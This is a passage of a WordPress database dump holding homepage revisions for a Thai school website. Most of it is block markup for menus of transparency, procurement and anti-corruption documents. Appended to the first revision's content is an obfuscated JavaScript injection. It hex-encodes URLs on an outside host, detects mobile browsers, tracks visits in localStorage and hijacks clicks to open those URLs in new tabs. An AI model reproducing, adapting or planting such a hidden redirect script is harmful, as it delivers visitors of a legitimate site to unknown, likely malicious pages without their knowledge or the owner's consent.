style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:20:07','2024-07-27 05:20:07','',14,'http://pakhaeng.ssk.in.th/?p=150',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(154,1,'2024-07-27 12:26:54','2024-07-27 05:26:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" 